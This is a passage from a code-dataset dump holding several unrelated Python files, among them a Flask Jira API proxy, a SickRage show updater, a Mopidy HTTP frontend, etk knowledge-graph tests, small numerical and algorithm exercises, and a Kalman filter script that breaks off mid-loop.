tempoGasto","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"342983536","text":"from flask import Flask, render_template\nfrom flask import jsonify\nfrom flask_cors import CORS\nfrom flask import request\nimport requests\nimport os\nimport json\n\nos.environ['HTTP_PROXY'] = os.environ['PROXY']\nos.environ['HTTPS_PROXY'] = os.environ['PROXY']\nserver = os.environ['JIRA_HOST']\napi = '/rest/api/2'\n\napp = Flask(__name__)\nCORS(app)\n\ndef get(url):\n return requests.get(url, auth=(os.environ['JIRA_USERNAME'], os.environ['JIRA_PASSWORD']))\n\ndef post(url, data):\n return requests.post(url, auth=(os.environ['JIRA_USERNAME'], os.environ['JIRA_PASSWORD']), headers={'Accept':'application/json'}, data=data)\n\n@app.route('/')\ndef index():\n return jsonify('')\n\n@app.route(api + '/issue', methods=['POST'])\ndef createIssue():\n print(json.loads(request.data))\n response = post(server + api + '/issue', json.loads(request.data))\n print(response)\n return 
jsonify(response.json())\n\n@app.route(api + '/issue/<key>')\ndef getIssue(key):\n response = get(server + api + '/issue/' + key)\n return jsonify(response.json())\n\n@app.route(api + '/issue/<key>/transitions')\ndef getIssueTransitions(key):\n response = get(server + api + '/issue/' + key + '/transitions')\n return jsonify(response.json())\n\n@app.route(api + '/issue/<key>/properties')\ndef getIssuePropertyKeys(key):\n response = get(server + api + '/issue/' + key + '/properties')\n return jsonify(response.json())\n\n@app.route(api + '/issue/<issueKey>/properties/<propertyKey>')\ndef getIssueProperty(issueKey, propertyKey):\n response = get(server + api + '/issue/' + issueKey + '/properties/' + propertyKey)\n return jsonify(response.json())\n\n@app.route(api + '/search', methods=['GET'])\ndef search():\n jql = request.args.get('jql')\n startAt = request.args.get('startAt') or '0'\n maxResults = request.args.get('maxResults') or '50'\n url = '/search?jql={0}&startAt={1}&maxResults={2}'.format(jql, startAt, maxResults).replace(\"'\", \"\")\n response = get(server + api + url)\n return jsonify(response.json())\n\n@app.route(api + '/project/<projectKey>')\ndef getProject(projectKey):\n url = server + api + '/project/' + projectKey\n print(str(url))\n response = get(str(url))\n print(response.json())\n return jsonify(response.json())\n\n@app.route(api + '/myself', methods=['GET'])\ndef myself():\n expand = '?expand=' + request.args.get('expand') if request.args.get('expand') else ''\n url = '/myself' + expand.replace(\"'\", \"\")\n response = get(server + api + url)\n return jsonify(response.json())\n\nif __name__ == '__main__':\n app.run(host=os.getenv('IP', '127.0.0.1'),port=5000)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"161561719","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# setting up the equation\ntp = np.array([0.25, 0.5, 0.75, 1])\nyp = np.array([3, 2, -3, 0])\nA = np.zeros((4, 4))\nrhs = np.zeros(4)\nfor i in range(4):\n A[i] = np.sin(1 * np.pi * tp[i]), np.sin(2 * np.pi * tp[i]), \\\n np.sin(3 * np.pi * tp[i]), np.sin(4 * np.pi * tp[i]) # Store one row at a time\n rhs[i] = yp[i]\n\n# Solving the equation\nsol = np.linalg.solve(A, rhs)\nprint('a, b, c, d: ', sol)\n\n# plotting the wave\nt = np.linspace(0, 1, 100)\ny = sol[0] * np.sin(1 * np.pi * t) + sol[1] * np.sin(2 * np.pi * t) + \\\n sol[2] * np.sin(3 * np.pi * t) + sol[3] * np.sin(4 * np.pi * t)\nplt.plot(t, y, 'b', label='wave')\nplt.xlabel('t')\nplt.ylabel('y')\n\n# plotting the initial points\nplt.plot(tp, yp, 'ro', label='data')\nplt.legend(loc='best');\n\n\n# %%\n","sub_path":"engineering-python/linear-algebra-challenge/theirsoln.py","file_name":"theirsoln.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"412397251","text":"# coding=utf-8\n\nimport xml.etree.ElementTree as ET\nimport requests\nimport time\nimport datetime\nimport threading\nimport sickbeard\n\nfrom sickbeard import logger\nfrom sickbeard import ui\nfrom sickbeard import db\nfrom sickbeard import network_timezones\nfrom sickbeard import failed_history\nfrom sickbeard import helpers\nfrom sickrage.helper.exceptions import CantRefreshShowException, CantUpdateShowException, ex\nfrom sickbeard.indexers.indexer_config import INDEXER_TVRAGE\nfrom sickbeard.indexers.indexer_config import INDEXER_TVDB\n\n\nclass ShowUpdater(object): # pylint: 
disable=too-few-public-methods\n def __init__(self):\n self.lock = threading.Lock()\n self.amActive = False\n\n self.session = helpers.make_session()\n\n def run(self, force=False): # pylint: disable=unused-argument, too-many-locals, too-many-branches, too-many-statements\n\n self.amActive = True\n\n bad_indexer = [INDEXER_TVRAGE]\n update_datetime = datetime.datetime.now()\n update_date = update_datetime.date()\n\n # update_timestamp = calendar.timegm(update_datetime.timetuple())\n update_timestamp = time.mktime(update_datetime.timetuple())\n cache_db_con = db.DBConnection('cache.db')\n result = cache_db_con.select(\"SELECT `time` FROM lastUpdate WHERE provider = 'theTVDB'\")\n if result:\n last_update = int(result[0]['time'])\n else:\n last_update = update_timestamp - 86400\n cache_db_con.action(\"INSERT INTO lastUpdate (provider,`time`) VALUES (?, ?)\", ['theTVDB', last_update])\n\n # refresh network timezones\n network_timezones.update_network_dict()\n\n # sure, why not?\n if sickbeard.USE_FAILED_DOWNLOADS:\n failed_history.trimHistory()\n\n update_delta = update_timestamp - last_update\n\n if update_delta >= 691200: # 8 days ( 7 days + 1 day of buffer time)\n update_file = 'updates_month.xml'\n elif update_delta >= 90000: # 25 hours ( 1 day + 1 hour of buffer time)\n update_file = 'updates_week.xml'\n else:\n update_file = 'updates_day.xml'\n\n # url = 'http://thetvdb.com/api/Updates.php?type=series&time=%s' % last_update\n url = 'http://thetvdb.com/api/%s/updates/%s' % (sickbeard.indexerApi(INDEXER_TVDB).api_params['apikey'], update_file)\n data = helpers.getURL(url, session=self.session, returns='text')\n if not data:\n logger.log(u\"Could not get the recently updated show data from %s. Retrying later. Url was: %s\" % (sickbeard.indexerApi(INDEXER_TVDB).name, url))\n self.amActive = False\n return\n\n updated_shows = []\n try:\n tree = ET.fromstring(data)\n for show in tree.findall(\"Series\"):\n updated_shows.append(int(show.find('id').text))\n except SyntaxError:\n pass\n\n logger.log(u\"Doing full update on all shows\")\n\n pi_list = []\n for cur_show in sickbeard.showList:\n\n if cur_show.indexer in bad_indexer:\n logger.log(u\"Indexer is no longer available for show [ %s ] \" % cur_show.name, logger.WARNING)\n else:\n indexer_name = sickbeard.indexerApi(cur_show.indexer).name\n\n try:\n if indexer_name == 'theTVDB':\n if cur_show.indexerid in updated_shows:\n pi_list.append(sickbeard.showQueueScheduler.action.updateShow(cur_show, True))\n # else:\n # pi_list.append(sickbeard.showQueueScheduler.action.refreshShow(cur_show, True))\n else:\n cur_show.nextEpisode()\n\n if cur_show.should_update(update_date=update_date):\n try:\n pi_list.append(sickbeard.showQueueScheduler.action.updateShow(cur_show, True))\n except CantUpdateShowException as e:\n logger.log(u\"Unable to update show: {0}\".format(str(e)), logger.DEBUG)\n else:\n logger.log(\n u\"Not updating episodes for show \" + cur_show.name + \" because it's last/next episode is not within the grace period.\",\n logger.DEBUG)\n # pi_list.append(sickbeard.showQueueScheduler.action.refreshShow(cur_show, True))\n except (CantUpdateShowException, CantRefreshShowException) as e:\n logger.log(u\"Automatic update failed: \" + ex(e), logger.ERROR)\n\n ui.ProgressIndicators.setIndicator('dailyUpdate', ui.QueueProgressIndicator(\"Daily Update\", pi_list))\n\n cache_db_con.action(\"UPDATE lastUpdate SET `time` = ? 
WHERE provider=?\", [update_timestamp, 'theTVDB'])\n\n logger.log(u\"Completed full update on all shows\")\n\n self.amActive = False\n\n def __del__(self):\n pass\n","sub_path":"sickbeard/show_updater.py","file_name":"show_updater.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"557954133","text":"from __future__ import unicode_literals\n\nimport json\nimport logging\nimport os\nimport threading\n\nimport pykka\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\n\nfrom mopidy import models, zeroconf\nfrom mopidy.core import CoreListener\nfrom mopidy.http import handlers\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpFrontend(pykka.ThreadingActor, CoreListener):\n apps = []\n statics = []\n\n def __init__(self, config, core):\n super(HttpFrontend, self).__init__()\n self.config = config\n self.core = core\n\n self.hostname = config['http']['hostname']\n self.port = config['http']['port']\n self.zeroconf_name = config['http']['zeroconf']\n self.zeroconf_service = None\n self.app = None\n\n def on_start(self):\n threading.Thread(target=self._startup).start()\n self._publish_zeroconf()\n\n def on_stop(self):\n self._unpublish_zeroconf()\n tornado.ioloop.IOLoop.instance().add_callback(self._shutdown)\n\n def _startup(self):\n logger.debug('Starting HTTP server')\n self.app = tornado.web.Application(self._get_request_handlers())\n self.app.listen(self.port,\n self.hostname if self.hostname != '::' else None)\n logger.info(\n 'HTTP server running at http://%s:%s', self.hostname, self.port)\n tornado.ioloop.IOLoop.instance().start()\n\n def _shutdown(self):\n logger.debug('Stopping HTTP server')\n tornado.ioloop.IOLoop.instance().stop()\n logger.debug('Stopped HTTP server')\n\n def on_event(self, name, **data):\n event = data\n event['event'] = name\n message = json.dumps(event, cls=models.ModelJSONEncoder)\n handlers.WebSocketHandler.broadcast(message)\n\n def _get_request_handlers(self):\n request_handlers = []\n\n request_handlers.extend(self._get_app_request_handlers())\n request_handlers.extend(self._get_static_request_handlers())\n\n # Either default Mopidy or user defined path to files\n static_dir = self.config['http']['static_dir']\n if static_dir and not os.path.exists(static_dir):\n logger.warning(\n 'Configured http/static_dir %s does not exist. 
'\n 'Falling back to default HTTP handler.', static_dir)\n static_dir = None\n if static_dir:\n request_handlers.append((r'/(.*)', handlers.StaticFileHandler, {\n 'path': self.config['http']['static_dir'],\n 'default_filename': 'index.html',\n }))\n else:\n request_handlers.append((r'/', tornado.web.RedirectHandler, {\n 'url': '/mopidy/',\n 'permanent': False,\n }))\n\n logger.debug(\n 'HTTP routes from extensions: %s',\n list((l[0], l[1]) for l in request_handlers))\n return request_handlers\n\n def _get_app_request_handlers(self):\n result = []\n for app in self.apps:\n result.append((\n r'/%s' % app['name'],\n handlers.AddSlashHandler\n ))\n request_handlers = app['factory'](self.config, self.core)\n for handler in request_handlers:\n handler = list(handler)\n handler[0] = '/%s%s' % (app['name'], handler[0])\n result.append(tuple(handler))\n logger.debug('Loaded HTTP extension: %s', app['name'])\n return result\n\n def _get_static_request_handlers(self):\n result = []\n for static in self.statics:\n result.append((\n r'/%s' % static['name'],\n handlers.AddSlashHandler\n ))\n result.append((\n r'/%s/(.*)' % static['name'],\n handlers.StaticFileHandler,\n {\n 'path': static['path'],\n 'default_filename': 'index.html'\n }\n ))\n logger.debug('Loaded static HTTP extension: %s', static['name'])\n return result\n\n def _publish_zeroconf(self):\n if not self.zeroconf_name:\n return\n\n self.zeroconf_http_service = zeroconf.Zeroconf(\n stype='_http._tcp', name=self.zeroconf_name,\n host=self.hostname, port=self.port)\n\n if self.zeroconf_http_service.publish():\n logger.debug(\n 'Registered HTTP with Zeroconf as \"%s\"',\n self.zeroconf_http_service.name)\n else:\n logger.debug('Registering HTTP with Zeroconf failed.')\n\n self.zeroconf_mopidy_http_service = zeroconf.Zeroconf(\n stype='_mopidy-http._tcp', name=self.zeroconf_name,\n host=self.hostname, port=self.port)\n\n if self.zeroconf_mopidy_http_service.publish():\n logger.debug(\n 'Registered Mopidy-HTTP with Zeroconf as \"%s\"',\n self.zeroconf_mopidy_http_service.name)\n else:\n logger.debug('Registering Mopidy-HTTP with Zeroconf failed.')\n\n def _unpublish_zeroconf(self):\n if self.zeroconf_http_service:\n self.zeroconf_http_service.unpublish()\n\n if self.zeroconf_mopidy_http_service:\n self.zeroconf_mopidy_http_service.unpublish()\n","sub_path":"mopidy/http/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"390246195","text":"import unittest, json\nfrom etk.knowledge_graph import KGSchema\nfrom etk.etk import ETK\nfrom etk.etk_exceptions import KgValueError\nfrom datetime import date, datetime\nfrom etk.ontology_api import Ontology\nfrom etk.ontology_namespacemanager import DIG\n\n\nclass TestKnowledgeGraph(unittest.TestCase):\n def setUp(self):\n sample_doc = {\n \"projects\": [\n {\n \"name\": \"etk\",\n \"description\": \"version 2 of etk, implemented by Runqi12 Shao, Dongyu Li, Sylvia lin, Amandeep and others.\",\n \"members\": [\n \"dongyu\",\n \"amandeep\",\n \"sylvia\",\n \"Runqi12\"\n ],\n \"date\": \"2007-12-05\",\n \"place\": \"columbus:georgia:united states:-84.98771:32.46098\",\n \"s\": \"segment_test_1\"\n },\n {\n \"name\": \"rltk\",\n \"description\": \"record linkage toolkit, implemented by Pedro, Mayank, Yixiang and several students.\",\n \"members\": [\n \"mayank\",\n \"yixiang\"\n ],\n \"date\": [\"2007-12-05T23:19:00\"],\n \"cost\": -3213.32,\n \"s\": \"segment_test_2\"\n }\n ]\n }\n 
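# A hedged sketch (an illustrative assumption; the real schema is the JSON\n # file loaded below): KGSchema consumes a master config shaped like\n # {'fields': {'developer': {'type': 'string'}, 'test_date': {'type': 'date'}}}\n 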
kg_schema = KGSchema(json.load(open('etk/unit_tests/ground_truth/test_config.json')))\n\n etk = ETK(kg_schema)\n self.doc = etk.create_document(sample_doc)\n\n def test_add_segment_kg(self) -> None:\n sample_doc = self.doc\n segments = sample_doc.select_segments(\"projects[*].s\")\n sample_doc.kg.add_value(\"segment\", segments)\n expected_segments = [\"segment_test_1\", \"segment_test_2\"]\n self.assertTrue(sample_doc.kg.value[\"segment\"][0][\"key\"] in expected_segments)\n self.assertTrue(sample_doc.kg.value[\"segment\"][1][\"key\"] in expected_segments)\n self.assertTrue('provenances' in sample_doc.value)\n provenances = sample_doc.value['provenances']\n self.assertTrue(len(provenances) == 2)\n self.assertTrue(provenances[0]['reference_type'] == 'location')\n\n def test_KnowledgeGraph(self) -> None:\n sample_doc = self.doc\n\n try:\n sample_doc.kg.add_value(\"developer\", json_path=\"projects[*].members[*]\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_date\", json_path=\"projects[*].date[*]\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_add_value_date\",\n value=[date(2018, 3, 28), {}, datetime(2018, 3, 28, 1, 1, 1)])\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_location\", json_path=\"projects[*].place\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_non_empty\", value=\"\")\n sample_doc.kg.add_value(\"test_non_empty\", value=\"non-empty\")\n sample_doc.kg.add_value(\"test_empty\", value=\"\", keep_empty=True)\n sample_doc.kg.add_value(\"test_empty\", value=\"empty\", keep_empty=True)\n except KgValueError:\n pass\n\n expected_developers = [\n {\n \"value\": \"dongyu\",\n \"key\": \"dongyu\"\n },\n {\n \"value\": \"amandeep\",\n \"key\": \"amandeep\"\n },\n {\n \"value\": \"sylvia\",\n \"key\": \"sylvia\"\n },\n {\n \"value\": \"Runqi12\",\n \"key\": \"runqi12\"\n },\n {\n \"value\": \"mayank\",\n \"key\": \"mayank\"\n },\n {\n \"value\": \"yixiang\",\n \"key\": \"yixiang\"\n }\n ]\n\n expected_date = [\n {\n \"value\": \"2007-12-05T00:00:00\",\n \"key\": \"2007-12-05T00:00:00\"\n },\n {\n \"value\": \"2007-12-05T23:19:00\",\n \"key\": \"2007-12-05T23:19:00\"\n }\n ]\n\n expected_add_value_date = [\n {\n \"value\": \"2018-03-28\",\n \"key\": \"2018-03-28\"\n },\n {\n \"value\": \"2018-03-28T01:01:01\",\n \"key\": \"2018-03-28T01:01:01\"\n }\n ]\n\n expected_location = [\n {\n \"value\": \"columbus:georgia:united states:-84.98771:32.46098\",\n \"key\": \"columbus:georgia:united states:-84.98771:32.46098\"\n }\n ]\n\n expected_non_empty = [{\"key\": \"non-empty\", \"value\": \"non-empty\"}]\n expected_empty = [{\"key\": \"\", \"value\": \"\"}, {\"key\": \"empty\", \"value\": \"empty\"}]\n\n self.assertEqual(expected_developers, sample_doc.kg.value[\"developer\"])\n self.assertEqual(expected_date, sample_doc.kg.value[\"test_date\"])\n self.assertEqual(expected_location, sample_doc.kg.value[\"test_location\"])\n self.assertEqual(expected_add_value_date, sample_doc.kg.value[\"test_add_value_date\"])\n self.assertEqual(expected_non_empty, sample_doc.kg.value[\"test_non_empty\"])\n self.assertEqual(expected_empty, sample_doc.kg.value[\"test_empty\"])\n\n def test_add_value_empty(self):\n self.doc.kg.add_value('test_zero', 0.0)\n self.assertEqual(self.doc.kg.value['test_zero'][0]['value'], 0.0)\n\n\nclass TestKnowledgeGraphWithOntology(unittest.TestCase):\n def setUp(self):\n ontology_content = '''\n @prefix : <http://dig.isi.edu/ontologies/dig/> .\n @prefix owl: <http://www.w3.org/2002/07/owl#> .\n @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\n @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .\n @prefix schema: <http://schema.org/> .\n 
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .\n :Person a owl:Class ;\n rdfs:subClassOf :Actor, :Biological_Object ;\n :common_properties :label, :title, :religion ; .\n :has_name a owl:DatatypeProperty ;\n schema:domainIncludes :Person ;\n schema:rangeIncludes xsd:string ; .\n :has_child a owl:ObjectProperty ;\n schema:domainIncludes :Person ;\n schema:rangeIncludes :Person ; .\n '''\n ontology = Ontology(ontology_content, validation=False, include_undefined_class=True, quiet=True)\n kg_schema = KGSchema(ontology.merge_with_master_config(dict()))\n etk = ETK(kg_schema=kg_schema, ontology=ontology, generate_json_ld=True)\n etk2 = ETK(kg_schema=kg_schema, ontology=ontology, generate_json_ld=False)\n self.doc = etk.create_document(dict(), doc_id='http://xxx/1', type_=[DIG.Person.toPython()])\n self.doc2 = etk2.create_document(dict(), doc_id='http://xxx/2', type_=[DIG.Person.toPython()])\n\n def test_valid_kg_jsonld(self):\n kg = self.doc.kg\n self.assertIn('@id', kg._kg)\n self.assertEqual('http://xxx/1', kg._kg['@id'])\n self.assertIn('@type', kg._kg)\n self.assertIn(DIG.Person.toPython(), kg._kg['@type'])\n\n def test_valid_kg(self):\n kg = self.doc2.kg\n self.assertNotIn('@id', kg._kg)\n self.assertNotIn('@type', kg._kg)\n\n def test_add_value_kg_jsonld(self):\n kg = self.doc.kg\n field_name = kg.context_resolve(DIG.has_name)\n self.assertEqual('has_name', field_name)\n kg.add_value(field_name, 'Jack')\n self.assertIn({'@value': 'Jack'}, kg._kg[field_name])\n field_child = kg.context_resolve(DIG.has_child)\n self.assertEqual('has_child', field_child)\n child1 = 'http://xxx/2'\n child2 = {'@id': 'http://xxx/3', 'has_name': 'Daniels', '@type': [DIG.Person],\n '@context': {'has_name': DIG.has_name.toPython()}}\n kg.add_value(field_child, child1)\n kg.add_value(field_child, child2)\n self.assertIn({'@id': 'http://xxx/2'}, kg._kg[field_child])\n\n def test_add_value_kg(self):\n kg = self.doc2.kg\n\n field_name = kg.context_resolve(DIG.has_name)\n\n self.assertEqual('has_name', field_name)\n kg.add_value(field_name, 'Jack')\n self.assertIn({'value': 'Jack', \"key\": \"jack\"}, kg._kg[field_name])\n","sub_path":"etk/unit_tests/test_knowledge_graph.py","file_name":"test_knowledge_graph.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"202997893","text":"# Example of using the filter function\n# A function that extracts only prime numbers\n# filter(a function that selects values meeting a condition, an iterable)\n\ndef getPrime(x):\n if x % 2 == 0:\n return\n\n for i in range(3, int(x/2), 2):\n if x % i == 0:\n break\n else:\n return x\n\nlist_data = [5,117,119,123453,11113]\nret = filter(getPrime,list_data)\nprint(list(ret))\n","sub_path":"071.filter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"332432251","text":"# Evaluation of postfix expression using Stack\nclass Stack:\n\n def __init__(self):\n self.items = []\n\n def push(self, item):\n self.items.append(item)\n\n def pop(self):\n if self.items:\n return self.items.pop()\n\n return None\n\n def peek(self):\n if self.items:\n return self.items[-1]\n\n return None\n\n\ndef evaluate_postfix(expr):\n\n stack = Stack()\n for i in range(len(expr)):\n\n # Push operand to stack\n # To convert expr[i] to digit subtract\n # '0' from expr[i].\n if is_operand(expr[i]):\n stack.push(ord(expr[i]) - ord(\"0\"))\n\n else:\n\n # Operator encountered\n # Pop two elements (operands) from stack\n # Perform operation and push result to stack\n op2 = 
stack.pop()\n op1 = stack.pop()\n result = perform(expr[i], op1, op2)\n stack.push(result)\n\n return stack.peek()\n\n\ndef is_operand(char):\n\n # Check for operand. If character is a digit\n # then it is an operand\n return char.isdigit()\n\n\ndef perform(operator, val1, val2):\n\n if operator == '+':\n return val1 + val2\n\n if operator == '-':\n return val1 - val2\n\n if operator == '*':\n return val1 * val2\n\n if operator == '/':\n return val1 / val2\n\n\nif __name__ == \"__main__\":\n\n test_expr = \"34*52*-9+\"\n print(evaluate_postfix(test_expr))\n","sub_path":"infix-prefix-postfix/evaluate_postfix.py","file_name":"evaluate_postfix.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"454887507","text":"from socket import *\nimport random\nimport sys\n\n#Test\ndef connect ():\n\t\"\"\"\n\tCreates a socket and connects to paris.cs.utexas.edu on port 35601.\n\tThis can be changed if necessary to connect somewhere else. Will exit\n\twith error code -1 if connect fails.\n\n\tReturns: \n\t\tConnected socket\n\t\"\"\"\n\tserverName = 'paris.cs.utexas.edu'\n\tserverPort = 35601\n\tsock = socket(AF_INET, SOCK_STREAM)\n\ttry:\n\t\tsock.connect((serverName, serverPort))\n\texcept:\n\t\tprint(\"Connection failed\")\n\t\texit(-1)\n\treturn sock\n\ndef send (c, sock, usernum):\n\t\"\"\"\n\tConstructs the correct string to send to the remote server and calls\n\tsock.send to send it over. If send fails, will exit with error code -1.\n\n\tArgs:\n\t\tc: An array with client IP [0] and port number [1].\n\t\tsock: A reference to the connected client socket.\n\t\tusernum: A randomly generated user number.\n\t\"\"\"\n\tsendstr = 'ex0 ' + '128.83.144.56-35601 ' + c[0] + '-' + str(c[1]) + ' ' + str(usernum) + ' D.B.Durbin' + '\n'\n\ttry:\n\t\tsock.send(str.encode(sendstr))\n\texcept:\n\t\tprint(\"Error in sending\")\n\t\texit(-1)\n\ndef receive (sock) :\n\t\"\"\"\n\tReceives two lines from the server in response to the initial send request.\n\tWill exit with error code -1 if either receive fails.\n\n\tArgs:\n\t\tsock: A reference to the connected socket.\n\n\tReturns:\n\t\trline1: First line of received message.\n\t\trline2: Second line of received message.\n\t\"\"\"\n\ttry:\n\t\trline1 = sock.recv(1024).decode()\n\texcept:\n\t\tprint (\"Failed to receive first line\")\n\t\texit(-1)\n\ttry:\n\t\trline2 = sock.recv(1024).decode()\n\texcept:\n\t\tprint (\"Failed to receive second line\")\n\t\texit(-1)\n\treturn rline1, rline2 \n\ndef decode_receive (line2, usernum, sock):\n\t\"\"\"\n\tDecodes the second line of the server's response. Checks for OK \n\tand that usernum + 1 is returned by calling the .split() method on line2.\n\tIt will then call send_ack if these conditions are met. Otherwise, exits\n\twith error code -1.\n\n\tArgs: \n\t\tline2: Second received line from receive method. \n\t\tusernum: Randomly generated usernum\n\t\tsock: Reference to connected socket.\n\t\"\"\"\n\tlist_l2 = line2.split()\n\t#Have to check for OK and that the returned number is equal to usernum + 1\n\tif ((list_l2[0] == \"OK\") and (int(list_l2[1]) == usernum+1)):\n\t\tprint (int(list_l2[3]))\n\t\tsend_ack(usernum, line2, sock)\n\telse: \n\t\tprint (\"There was an error: \" + line2)\n\t\texit(-1)\n\ndef send_ack (usernum, line2, sock):\n\t\"\"\"\n\tSends acknowledgement to server after determining the server responded\n\twith a properly formatted response. Called directly from decode_receive.\n\tBuilds a send string by splitting line2. 
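The ack has the form 'ex0 <field 1 of line2> <field 3 of line2 + 1>', inferred from the code below. 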
Will exit with -1 if send fails.\n\t\"\"\"\n\tlist_l2 = line2.split()\n\tack_string = \"ex0 \" + str((list_l2[1])) + \" \" + str((int(list_l2[3]) + 1)) + '\n'\n\ttry:\n\t\tsock.send(str.encode((ack_string)))\n\texcept:\n\t\tprint(\"Sending failure of ack line\")\n\t\texit(-1)\n\ndef receive_ack (sock) :\n\t\"\"\"\n\tReceives acknowledgement from the server. Splits the line and makes sure OK \n\twas received. Prints the received line if OK was received, otherwise prints \n\tan error message.\n\t\"\"\"\n\tackline = sock.recv(1024).decode()\n\tack_split = ackline.split()\n\tif (ack_split[len(ack_split) -2] == \"OK\"):\n\t\tprint(int(ack_split[len(ack_split) - 1]))\n\telse :\n\t\tprint (\"Error in received ack: \" + ackline)\n\ndef main():\n\t\"\"\"\n\tThis follows typical Python structure by calling the helper methods in order.\n\tBegins with generating a\n\trandom int from 0-9000 for the usernum. Then calls connect, gets the new \n\tclient socket's IP and Port, calls send, decodes the response, checks if it's\n\tok and then sends an ack back and receives the server ack. Closes the socket at \n\tthe end.\n\t\"\"\"\n\tusernum = random.randint(0,9000)\n\tsock = connect()\n\tc = sock.getsockname()\n\tsend (c,sock,usernum)\n\trline1, rline2 = receive (sock)\n\tdecode_receive(rline2, usernum, sock)\n\treceive_ack(sock)\n\tsock.close()\n\nmain()","sub_path":"ex0.py","file_name":"ex0.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"205232928","text":"import numpy as np\nimport math\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\n\n# Local calls to own modules\nimport random\n\ndef GAUSS(SIG):\n\tSUM=0\n\tfor j in range(1,7):\n\t\t# THE NEXT STATEMENT PRODUCES A UNIF. DISTRIBUTED NUMBER BETWEEN -0.5 AND 0.5\n\t\tIRAN=random.uniform(-0.5, 0.5)\n\t\tSUM=SUM+IRAN\n\t\t# In this case we have to multiply the resultant random variable by the square root of 2.\n\tX=math.sqrt(2)*SUM*SIG\n\treturn (X)\n\t\ndef GAUSS_PY(SIG):\n\tX=(random.uniform(-3.0,3.0))*SIG\n\treturn (X)\t\n\ndef f1(x1,x2,t):\n\tdx1dt = x2\n\treturn (dx1dt)\n\ndef f2(x1,x2,t):\n\tdx2dt = (0.0034*G*x2*x2*math.exp(-x1/22000.0)/(2.0*BETAH))-G\n\treturn (dx2dt)\n\ndef PROJECT(TS,XP,XDP,BETAP,HP):\n\tT=0.\n\tX=XP\n\tXD=XDP\n\tBETA=BETAP\n\tH=HP\n\twhile (T<=(TS-.0001)):\n\t\tXDD=.0034*32.2*XD*XD*math.exp(-X/22000.)/(2.*BETA)-32.2\n\t\tXD=XD+H*XDD\n\t\tX=X+H*XD\n\t\tT=T+H\n\tXH=X\n\tXDH=XD\n\tXDDH=XDD\n\treturn [XH,XDH]\n\nt=[]\nx1=[]\nxs=[]\nres =[]\nx1_hat=[]\nx1dot=[]\nx1dot_hat=[]\nxs=[]\nxddot_hat=[]\nx1_hat_ERR=[]\nsp11=[]\nsp11n=[]\nx1dot_hat_ERR=[]\nsp22=[]\nsp22n=[]\nbeta_hat_ERR = []\nsp33=[]\nsp33n=[]\nxddot_hat_ERR=[]\nx2ddold =[]\nk1 =[]\nk2 =[]\n\nTS=.1\nXH=0\nXDH=0\nXDDH=0\nSIGMA_NOISE=25.\nX1=200000.\nX1D=-6000.\nBETA=500.\nBETAH=800.\nXH=200025.\nXDH=-6150.\nTS=0.1\nTF=30.\n\n'''\nAs the object descends in altitude, there is more drag, and the object becomes\nmore observable from a filtering point of view. However, because there is no\nprocess noise the filter gains will go to zero. This means that the filter will\nstop paying attention to the measurements (i.e., when the ballistic coefficient \nis most observable) and hangoff error will result, as can be seen in Fig. 8.5. 
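(Hangoff error: because the gains have collapsed, the estimate settles on a biased value and the estimation error never returns to zero.)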
\nFinally, process noise was added to the extended Kalman filter.\n'''\nPHIS=3000.\nT=0.\nS=0.\nH = 0.001\nG = 32.2\nrk =0\n\np_11 = SIGMA_NOISE*SIGMA_NOISE\t# Error in the altitude\np_22 = 150*150\t\t\t\t\t# Error in the velocity\np_33 = 300*300\t\t\t\t\t# Error in BETA parameter\n\nP = np.matrix([[p_11, 0, 0],[0, p_22, 0], [0, 0, p_33]])\nI = np.matrix([[1,0,0],[0,1,0], [0,0,1]])\n\nHMAT = np.matrix([[1, 0, 0]])\nR = np.matrix([[SIGMA_NOISE**2]])\n\nH = TS\ndt = H\nwhile (T <= 30.0):\n\tk11 = dt*f1(X1,X1D,T)\n\tk21 = dt*f2(X1,X1D,T)\n\tk12 = dt*f1(X1+0.5*k11,X1D+0.5*k21,T+0.5*dt)\n\tk22 = dt*f2(X1+0.5*k11,X1D+0.5*k21,T+0.5*dt)\n\tk13 = dt*f1(X1+0.5*k12,X1D+0.5*k22,T+0.5*dt)\n\tk23 = dt*f2(X1+0.5*k12,X1D+0.5*k22,T+0.5*dt)\n\tk14 = dt*f1(X1+k13,X1D+k23,T+dt)\n\tk24 = dt*f2(X1+k13,X1D+k23,T+dt)\n\tX1 = X1 + (k11+2*k12+2*k13+k14)/6\n\tX1D = X1D + (k21+2*k22+2*k23+k24)/6\n\tT = T+dt\n\tS = S+H;\n\t#print (T, S)\n\t# this step is here so that the discritezation of the Riccati equations takes 